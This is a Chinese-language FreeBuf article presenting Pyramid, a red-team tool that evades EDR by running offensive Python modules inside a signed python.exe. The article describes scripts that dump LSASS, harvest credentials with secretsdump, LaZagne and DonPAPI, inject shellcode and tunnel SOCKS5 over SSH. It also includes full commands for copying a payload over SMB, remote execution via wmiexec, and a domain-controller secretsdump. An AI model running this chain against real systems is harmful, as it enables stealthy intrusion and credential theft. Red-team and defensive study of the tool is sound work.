Pyramid:一款专为红队设计的EDR绕过工具
2022-12-19 19:3:40 Author: FreeBuf(查看原文) 阅读量:11 收藏

 关于Pyramid 

Pyramid是一款由多个Python脚本和模块依赖组成的EDR绕过工具,该工具专为红队研究人员设计,可以帮助广大研究人员通过利用Python的一些规避属性并尝试让EDR将其视为合法的Python应用程序,来实现红队渗透任务。

 工具特性 

1、使用了Python自带的工具包来提供合法的声誉良好的签名Python解释器;
2、Python有许多合法的应用程序,因此python.exe源码中也有很多不同的遥测技术(因为使用了本地API)。我们可以通过在Python.exe进程中执行操作,来尝试利用python.exe的遥测指纹;
3、利用了Python代码执行的审计缺少这一现状,即缺少审核功能;
4、所有的操作可以在python内部本地完成,比如说,动态导入Python模块以运行渗透测试工具,并直接在Python.exe中执行Beacon对象文件;

 工具脚本 

当前版本的Pyramid提供了八个主要的功能脚本:
base-bh.py:该脚本负责在内存中导入和执行python-BloodHound;
base-secretsdump.py:该脚本负责在内存中导入和执行Impacket的secretsdump模块;
base-BOF-lsass.py:该脚本使用了精简版的nanodump从python.exe转储lsass;
base-tunnel-inj.py:该脚本负责在一个新的线程中导入和执行paramiko来创建一个SSH本地端口转发(至一个远程SSH服务器),之后便能够在本地向python.exe中注入Shellcode;
base-DonPAPI.py:该脚本负责在内存中导入和执行DonPAPI,执行结果和提取出的凭证将会存储在Python内置包目录中;
base-LaZagne.py:该脚本负责在内存中导入和执行LaZagne;
base-tunnel-socks5:该脚本负责在一个新的线程中导入和执行paramiko来创建一个SSH本地端口转发(至一个远程SSH服务器),接下来会在目标设备上执行一台本地Socks5代理服务器,该服务器可以通过SSH信道远程访问;
base-clr:该脚本负责导入Pythonnet 并在内存中加载和执行一个.NET程序集;

 工具下载 

由于该工具基于Python 3开发,因此广大研究人员首先需要在本地设备上安装并配置好Python 3环境。接下来,使用下列命令将该项目源码克隆至本地:
git clone https://github.com/naksyn/Pyramid.git

(向右滑动、查看更多)

 工具使用 

首先,我们需要针对HTTP服务器生成SSL证书:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

(向右滑动、查看更多)

接下来,使用SSL证书运行Pyramid HTTP服务器并提供基础认证功能:
python3 PyramidHTTP.py 443 testuser Sup3rP4ss! /home/user/SSL/key.pem /home/user/SSL/cert.pem /home/user/Pyramid/Server/

(向右滑动、查看更多)

Pyramid服务器运行之后,我们就可以使用工具提供的功能脚本来执行任务了。

 工具使用演示 

在下面的例子中,我们将使用pythonw.exe(无窗口的Python可执行程序)来在远程设备上执行base-tunnel-socks5.py,而且不会打开python.exe终端窗口:
开启Pyramid服务器:
python3 PyramidHTTP.py 443 testuser Sup3rP4ss! /home/nak/projects/dev/Proxy/Pyramid/key.pem /home/nak/projects/dev/Proxy/Pyramid/cert.pem /home/nak/projects/dev/Proxy/Pyramid/Server/

(向右滑动、查看更多)

将下载下来的信息存储到cradle.py中,然后把解压的内置包和cradle.py拷贝到目标设备:
smbclient //192.168.1.11/C$ -U domain/user -c 'prompt OFF; recurse ON; lcd /home/user/Downloads/python-3.10.4-embed-amd64; cd Users\Public; mkdir python-3.10.4-embed-amd64; cd python-3.10.4-embed-amd64; mput *'

(向右滑动、查看更多)

执行pythonw.exe并启动cradle:
/usr/share/doc/python3-impacket/examples/wmiexec.py domain/user:"Password1\!"@192.168.1.11 'C:\Users\Public\python-3.10.4-embed-amd64\pythonw.exe C:\Users\Public\python-3.10.4-embed-amd64\cradle.py'

(向右滑动、查看更多)

在目标设备运行Socks5服务器并开启SSH信道,然后修改proxychains.conf并将流量通过信道发送至目标:
proxychains impacket-secretsdump domain/user:"Password1\!"@192.168.1.50 -just-dc

(向右滑动、查看更多)

 许可证协议 

本项目的开发与发布遵循Apache-2.0开源许可证协议。

 项目地址 

Pyramid:https://github.com/naksyn/Pyramid

参考资料:

https://www.python.org/ftp/python/3.10.4/python-3.10.4-embed-amd64.zip
https://www.virustotal.com/gui/file/261f682238e2dc3296038c8bd78dd01e5874e1177ebe3da2afcba35ef82d73b7
https://peps.python.org/pep-0578/
https://github.com/naksyn/talks/blob/main/DEFCON30/Diego%20Capriotti%20-%20DEFCON30%20Adversary%20Village%20-%20%20Python%20vs%20Modern%20Defenses.pdf
https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html
https://twitter.com/snovvcrash
https://github.com/SecureAuthCorp/impacket

精彩推荐


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651210023&idx=4&sn=9aa30bee713c0816e7ccaa63b5d8ff32&chksm=bd1dd3ac8a6a5abacb61c30af1a96f5ae320fff1f13d74fc37e81ad76e4908255e6559a36a3b#rd
如有侵权请联系:admin#unsafe.sh